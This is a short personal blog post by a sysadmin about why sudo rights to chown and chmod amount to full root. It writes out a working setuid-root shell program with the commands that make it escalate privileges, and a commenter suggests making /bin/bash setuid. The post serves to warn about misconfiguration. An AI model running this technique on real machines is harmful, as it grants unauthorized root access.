Privilege Escalation – be slack and pay for it   4 comments

My predecessor(s) had left a bunch of people at my work place (not even developers) with sudo access to chown and chmod – for the purpose of data management. For a while I had tried to explain that having sudo access to just those two commands is effectively having full root access on the machines.

I had to demonstrate it. So I did:

cat <<EOF >> make-me-root.c
#include <unistd.h>
int main() {
    setuid(0);
    execv("/bin/bash", NULL);
    return 0;
}
EOF

gcc -o make-me-root make-me-root.c
sudo chown root make-me-root
sudo chmod u+s make-me-root

./make-me-root

Alright, demonstrated. Now it’s time for the raising eyebrows to follow.

And now also comes the part where I know it’s almost impossible to revoke privileges from people after they got used to a broken workflow.

Advertisements

Posted January 30, 2015 by malkodan in Linux

Tagged with , , ,

4 responses to “Privilege Escalation – be slack and pay for it

Subscribe to comments with RSS.

  1. you are right, but there’s not need to compile something in order to get root access on a system where one has chown chmod, I can think of at least 3 methods of exploiting sudo chmod and sudo chown in order to get root access… (found about this blog just today hence the late comment)

  2. Hi Paolo, thanks for the comment. Then please enlighten us.

  3. Probably the easiest would be to add setuid (using chmod) to /bin/bash.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: